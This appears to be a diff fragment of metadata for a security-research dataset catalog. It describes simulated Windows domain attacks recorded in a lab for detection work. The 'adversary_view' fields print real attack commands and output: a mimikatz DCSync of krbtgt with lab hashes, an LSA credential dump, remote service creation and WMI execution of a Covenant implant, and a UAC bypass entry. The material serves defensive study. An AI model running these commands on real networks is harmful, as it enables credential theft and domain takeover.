+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "DCSync",
+                    "script": "https://github.com/cobbr/Covenant/blob/c4d7eba0cfc29e3d5961248ec984a209d4d05de3/Covenant/Data/Tasks/SharpSploit.Credentials.yaml"
+                }
+            ],
+            "permissions_required": [
+                "Domain Admin"
+            ],
+            "adversary_view": "(wardog) > DCSync /username:\"krbtgt\" /fqdn:\"theshire.local\" /dc:\"MORDORDC\"\n\n  .#####.   mimikatz 2.2.0 (x64) #17763 Apr  9 2019 23:22:27\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # lsadump::dcsync /user:krbtgt /domain:theshire.local /dc:MORDORDC\n[DC] 'theshire.local' will be the domain\n[DC] 'MORDORDC' will be the DC server\n[DC] 'krbtgt' will be the user account\n\nObject RDN           : krbtgt\n\n** SAM ACCOUNT **\n\nSAM Username         : krbtgt\nAccount Type         : 30000000 ( USER_OBJECT )\nUser Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )\nAccount expiration   : \nPassword last change : 8/4/2020 9:30:22 PM\nObject Security ID   : S-1-5-21-3669966080-2286457517-972388166-502\nObject Relative ID   : 502\n\nCredentials:\n  Hash NTLM: 9810d5b30826619ed962194bc35cb66d\n    ntlm- 0: 9810d5b30826619ed962194bc35cb66d\n    lm  - 0: 2bd18bfa988700fc1f845909043f7785\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n    Random Value : d7477916da5d01ca6366caaad478f535\n\n* Primary:Kerberos-Newer-Keys *\n    Default Salt : THESHIRE.LOCALkrbtgt\n    Default Iterations : 4096\n    Credentials\n      aes256_hmac       (4096) : 1ffb5b5ca0ba20b19de132f44a580d67c96362f4ec21c8e8057ad8b4a5cbe99e\n      aes128_hmac       (4096) : 49e4ec6edd3d27f0eda5ed4b32df29c4\n      des_cbc_md5       (4096) : f162e6c46b5d10e9\n\n* Primary:Kerberos *\n    Default Salt : THESHIRE.LOCALkrbtgt\n    Credentials\n      des_cbc_md5       : f162e6c46b5d10e9\n\n* Packages *\n    NTLM-Strong-NTOWF\n\n* Primary:WDigest *\n    01  1e9687e12c22c61ce56e06b679067068\n    02  bd4ff4a6ad0092c086110d7f177bf2dd\n    03  bef34dc3488c458be7a07de25cee5c25\n    04  1e9687e12c22c61ce56e06b679067068\n    05  bd4ff4a6ad0092c086110d7f177bf2dd\n    06  ec54a02a8b4c407023b921f839db0695\n    07  1e9687e12c22c61ce56e06b679067068\n    08  34460bb2c44aae9f8397a5df0846babd\n    09  34460bb2c44aae9f8397a5df0846babd\n    10  0a104dba17fcb7b32f0a39c5694ae42d\n    11  cec2d9932979ed578ba260b233290ad6\n    12  34460bb2c44aae9f8397a5df0846babd\n    13  dbd9ff299298ee7649121015643a45c0\n    14  cec2d9932979ed578ba260b233290ad6\n    15  2d5f29cfd994b4a31dc71ff0d4f4b735\n    16  2d5f29cfd994b4a31dc71ff0d4f4b735\n    17  1a6e2adbc126ac59916af47ca0c2047d\n    18  b99ae20fdbff05738cc3c4341f5819b0\n    19  791ed67574eee311ed74e911f840e622\n    20  71d939df702fe13f003e39b9421f450d\n    21  cc9c9f66309c5d6412773943efa08efd\n    22  cc9c9f66309c5d6412773943efa08efd\n    23  1f076ec382ae6f7cf5ca3750ad70c140\n    24  a16cb7dc0b7a969d65aff54a4180d63a\n    25  a16cb7dc0b7a969d65aff54a4180d63a\n    26  80706a2b93f2a4d53d6df1b4b8bfe029\n    27  c3c8bedd3c2f3db046410f60ab728f57\n    28  e0b5d1db4b2119a9e621a2a3199828bb\n    29  b23dd36a70988139bbee48c668232993"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:35.734843+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200805034820.yaml": {
+        "title": "Covenant SC.exe Utility Query",
+        "id": "SDWIN-200805034820",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/05",
+        "modification_date": "2020/08/05",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC QueryServiceStatus",
+            "SMB Svcctl"
+        ],
+        "description": "This dataset represents an adversary leveraging the sc.exe utility to query (RPC QueryServiceStatus method) for the statu of a service on a remote endpoint.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sc_query_dcerpc_smb_svcctl.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sc_query_dcerpc_smb_svcctl.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "SharpSC",
+                    "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "sc.exe \\\\WORKSTATION6 query ikeext"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:35.919844+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200806012009.yaml": {
+        "title": "Covenant SharpSC Query",
+        "id": "SDWIN-200806012009",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/06",
+        "modification_date": "2020/08/06",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC EnumServiceStatusW",
+            "SMB Svcctl"
+        ],
+        "description": "This dataset represents a threat actor leveraging the RPC method EnumServiceStatusW over SMB svcctl to query the status of a service on a remote endpoint..",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_query_dcerpc_smb_svcctl.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_query_dcerpc_smb_svcctl.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "SharpSC",
+                    "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(wardog) > SharpSC /command:\"action=query computername=WORKSTATION6 service=ikeext\"\n\n[+] Service information for IKEEXT on WORKSTATION6:\n\n  DisplayName: IKE and AuthIP IPsec Keying Modules\n  ServiceName: IKEEXT\n  Status     : Stopped\n  CanStop    : False"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:41.995340+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200806015757.yaml": {
+        "title": "Covenant Remote File Copy",
+        "id": "SDWIN-200806015757",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/06",
+        "modification_date": "2020/08/06",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "SMB CreateRequest"
+        ],
+        "description": "This dataset represents a threat actor remotely copying a file over SMB (CreateRequest).",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "datasets": [
+            {
+                "name": "Covenant Remote File Copy"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_copy_smb_CreateRequest.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_copy_smb_CreateRequest.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "Copy",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "[09/22/2020 18:53:30 UTC] Copy completed\n(wardog) > Copy /source:\"C:\\Users\\pgustavo\\Desktop\\GruntHTTP.exe\" /destination:\"\\\\WORKSTATION6\\C$\\ProgramData\\GruntHTTP.exe\"\n\nSuccessfully copied file from: C:\\Users\\pgustavo\\Desktop\\GruntHTTP.exe to: \\\\WORKSTATION6\\C$\\ProgramData\\GruntHTTP.exe"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:42.189930+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200806022635.yaml": {
+        "title": "Covenant SharpSC Create",
+        "id": "SDWIN-200806022635",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/06",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC CreateService",
+            "SMB Svcctl"
+        ],
+        "description": "This dataset represents adversaries remotely creating a service via RPC methods such as CreateService over SMB named pipes such as svcctl.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_create_dcerpc_smb_svcctl.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_create_dcerpc_smb_svcctl.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "SharpSC",
+                    "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(wardog) > SharpSC /command:\"action=create computername=WORKSTATION6 service=Cyb3rWard0g displayname=OTR binpath=C:\\Windows\\System32\\GruntHTTP2.exe\"\n\n[-] Error uninstalling Cyb3rWard0g on WORKSTATION6. Reason: ServiceHandle is invalid.\n\n[*] Attempting to create service Cyb3rWard0g on WORKSTATION6...\n\n[*] Created Cyb3rWard0g Service on WORKSTATION6"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:42.366930+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200806030120.yaml": {
+        "title": "Covenant SharpSC Start",
+        "id": "SDWIN-200806030120",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/06",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC StartService",
+            "SMB Svcctl"
+        ],
+        "description": "This dataset represents adversaries remotely starting a service via RPC methods such as StartService over SMB named pipes such as svcctl.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_start_dcerpc_smb_svcctl.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_start_dcerpc_smb_svcctl.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "SharpSC",
+                    "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(wardog) > SharpSC /command:\"action=start computername=WORKSTATION6 service=ikeext\"\n\n[*] Attempting to start service ikeext on WORKSTATION6...\n\n[+] Successfully started ikeext on WORKSTATION6!\n\n  DisplayName: IKE and AuthIP IPsec Keying Modules\n\n  ServiceName: ikeext\n\n  Status     : Running\n\n  CanStop    : True"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:42.564930+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200806031938.yaml": {
+        "title": "Covenant SharpSC Stop Service",
+        "id": "SDWIN-200806031938",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/06",
+        "modification_date": "2020/08/06",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC ControlService",
+            "Stop Service",
+            "SMB Svcctl"
+        ],
+        "description": "This dataset represents a threat actor using the RPC ControlService method over SMB to stop a service.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_stop_dcerpc_smb_svcctl.zip"
+            },
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_stop_dcerpc_smb_svcctl.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "SharpSC",
+                    "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(wardog) > SharpSC /command:\"action=stop computername=WORKSTATION6 service=ikeext\"\n\n[*] Attempting to stop service ikeext on WORKSTATION6...\n\n[+] Successfully stopped ikeext on WORKSTATION6!\n\n  DisplayName: IKE and AuthIP IPsec Keying Modules\n\n  ServiceName: ikeext\n\n  Status     : Stopped\n\n  CanStop    : False\n  https://github.com/djhohnstein/SharpSC"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:42.730930+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200806035621.yaml": {
+        "title": "Covenant SharpWMI Exec",
+        "id": "SDWIN-200806035621",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "WMI IWbemServices ExecMethod"
+        ],
+        "description": "This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.",
+        "attack_mappings": [
+            {
+                "technique": "T1047",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpwmi_create_dcerpc_wmi.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpwmi_create_dcerpc_wmi.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "SharpWMI",
+                    "script": "https://github.com/GhostPack/SharpWMI"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(wardog) > SharpWMI /command:\"action=exec computername=WORKSTATION6 command=\\\"C:\\\\Windows\\\\System32\\\\GruntHTTP2.exe\\\"\"\n\n[*] Host                           : WORKSTATION6\n\n[*] Command                        : \"C:\\\\Windows\\\\System32\\\\GruntHTTP2.exe\"\n\n[*] Creation of process returned   : 0\n\n[*] Process ID                     : 3824"
+        },
+        "references": [
+            "https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:42.902931+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200806115603.yaml": {
+        "title": "Covenant PowerShell Remoting Command",
+        "id": "SDWIN-200806115603",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/06",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "PowerShell Remoting"
+        ],
+        "description": "This dataset represents adversaries executing malicious code on remote hosts using PowerShell Remoting (WinRM).",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "006",
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_psremoting_command.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_psremoting_command.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "PowerShellRemotingCommand",
+                    "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.LateralMovement.yaml"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "[08/06/2020 15:56:13 UTC] PowerShellRemotingCommand completed\n\n(wardog) > PowerShellRemotingCommand /computername:\"WORKSTATION6\" /command:\"get-process\" /domain:\"theshire.local\" /username:\"pgustavo\" /password:\"[placeholder]\"\n\nHandles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                     PSComputerName                \n\n-------  ------    -----      -----     ------     --  -- -----------                     --------------                \n\n    259      17     4712      24656       0.58   7996   2 ApplicationFrameHost            WORKSTATION6                  \n\n    118       7     6396      10664       0.03   1356   0 conhost                         WORKSTATION6                  \n\n    612      22     1720       4900       0.69    524   0 csrss                           WORKSTATION6                  \n\n    168      11     1544       4164       0.06    604   1 csrss                           WORKSTATION6                  \n\n    401      14     1664       5168       6.94   2528   2 csrss                           WORKSTATION6                  \n\n    384      15     3648      13620       5.97   2888   2 ctfmon                          WORKSTATION6                  \n\n    135       8     2016      12064       0.19   4952   2 dllhost                         WORKSTATION6                  \n\n    235      22     5100      14172       0.33   5028   2 dllhost                         WORKSTATION6                  \n\n    242      16     3776      12940       0.33   7864   2 dllhost                         WORKSTATION6                  \n\n    665      24    17888      38728       0.27    588   1 dwm                             WORKSTATION6                  \n\n    721      32    31996      69820      19.36   2512   2 dwm                             WORKSTATION6                  \n\n  1961      75    43016     122660      26.72   4156   2 explorer                        WORKSTATION6                  \n\n    32       5     1188       2072       0.03    880   1 fontdrvhost                     WORKSTATION6                  \n\n    32       5     1260       2172       0.08    884   0 fontdrvhost                     WORKSTATION6                  \n\n    32       7     3092       5864       0.75   4084   2 fontdrvhost                     WORKSTATION6                  \n\n      0       0       60          8                 0   0 Idle                            WORKSTATION6                  \n\n    632      34    17136      49032       0.48    608   1 LogonUI                         WORKSTATION6"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:43.073931+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200806130039.yaml": {
+        "title": "Covenant GetDomainGroup Domain Admins",
+        "id": "SDWIN-200806130039",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/06",
+        "modification_date": "2020/08/06",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Domain Groups Enumeration",
+            "LDAP SearchRequest"
+        ],
+        "description": "This dataset represents a threat actor enumerating the domain groups via LDAP (i.e. SearchRequest Method) in an environment.",
+        "attack_mappings": [
+            {
+                "technique": "T1069",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/covenant_getdomaingroup_ldap_searchrequest_domain_admins.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/covenant_getdomaingroup_ldap_searchrequest_domain_admins.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "GetDomainGroup",
+                    "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSploit.Enumeration.yaml"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "[09/22/2020 18:10:15 UTC] GetDomainGroup completed\n(wardog) > GetDomainGroup /identities:\"Domain Admins\"\nsamaccountname: Domain Admins\nsamaccounttype: GROUP_OBJECT\ndistinguishedname: CN=Domain Admins,CN=Users,DC=theshire,DC=local\ncn: Domain Admins\nobjectsid: S-1-5-21-4228717743-1032521047-1810997296-512\ngrouptype: 0\nadmincount: 1\nname: Domain Admins\ndescription: Designated administrators of the domain\nmemberof: CN=Denied RODC Password Replication Group,CN=Users,DC=theshire,DC=local, CN=Administrators,CN=Builtin,DC=theshire,DC=local\nuseraccountcontrol: 0\nbadpasswordtime: 1/1/0001 12:00:00 AM\npwdlastset: 1/1/0001 12:00:00 AM\nwhencreated: 9/17/2020 3:14:46 PM\nwhenchanged: 9/17/2020 3:29:58 PM\naccountexpires: 1/1/0001 12:00:00 AM\nlastlogon: 1/1/0001 12:00:00 AM\nlastlogoff: 1/1/0001 12:00:00 AM\nobjectcategory: CN=Group,CN=Schema,CN=Configuration,DC=theshire,DC=local\nusnchanged: 12909\ninstancetype: 4\nobjectclass: top, group\niscriticalsystemobject: True\nusncreated: 12345\ndscorepropagationdata: 9/17/2020 3:29:58 PM, 9/17/2020 3:14:47 PM, 1/1/1601 12:04:16 AM\nadspath: LDAP://CN=Domain Admins,CN=Users,DC=theshire,DC=local\nobjectguid: bba6ff30-abfc-4166-b209-5e6edd49366b\nlastlogontimestamp: 1/1/0001 12:00:00 AM"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:43.252931+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200807103913.yaml": {
+        "title": "Empire Mimikatz Lsadump LSA Patch",
+        "id": "SDWIN-200807103913",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "LSASS Memory Credentials Read"
+        ],
+        "description": "This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "LSASS Access from Non System Account",
+                "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "lsadump",
+                    "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/lsadump*\n(Empire: powershell/credentials/mimikatz/lsadump) > info\n\n              Name: Invoke-Mimikatz LSA Dump\n            Module: powershell/credentials/mimikatz/lsadump\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract a\n  particular user hash from memory. Useful on domain\n  controllers.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt\n  ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls\n  a\n\nOptions:\n\n  Name     Required    Value                     Description\n  ----     --------    -------                   -----------\n  Agent    True        B7Y8G4XC                  Agent to run module on.                 \n  Username False                                 Username to extract the hash for, blank \n                                                for all local passwords.                \n\n(Empire: powershell/credentials/mimikatz/lsadump) > execute\n[*] Tasked B7Y8G4XC to run TASK_CMD_JOB\n[*] Agent B7Y8G4XC tasked with task ID 2\n[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/lsadump\n(Empire: powershell/credentials/mimikatz/lsadump) > \nJob started: VGHXZ5\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug  4 2020 20:16:54\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # lsadump::lsa /patch\nDomain : WORKSTATION5 / S-1-5-21-1549354820-3669603161-4025758380\n\nRID  : 000001f7 (503)\nUser : DefaultAccount\nLM   : \nNTLM : \n\nRID  : 000001f5 (501)\nUser : Guest\nLM   : \nNTLM : \n\nRID  : 000001f4 (500)\nUser : wardog\nLM   : \nNTLM : 42ddb2963bbe8f1c075fc869d3bce33e\n\nRID  : 000001f8 (504)\nUser : WDAGUtilityAccount\nLM   : \nNTLM : 45a313f1860be24e967e55b94649aa31\n\n(Empire: powershell/credentials/mimikatz/lsadump) >"
+        },
+        "references": [
+            "https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:43.428930+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200904032946.yaml": {
+        "title": "Invoke BypassUAC FodHelper",
+        "id": "SDWIN-200904032946",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/04",
+        "modification_date": "2020/09/04",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "BypassUAC",
+            "Registry Modification",
+            "Windows Registry FodHelper"
+        ],
+        "description": "This dataset represents adversaries elevating privileges (bypassing uac) by performing an registry modification for FodHelper.",
+        "attack_mappings": [
+            {
+                "technique": "T1548",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0004"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/privilege_escalation/host/empire_uac_shellapi_fodhelper.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "bypassuac_fodhelper",
+                    "script": "https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/privesc/Invoke-FodHelperBypass.ps1"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
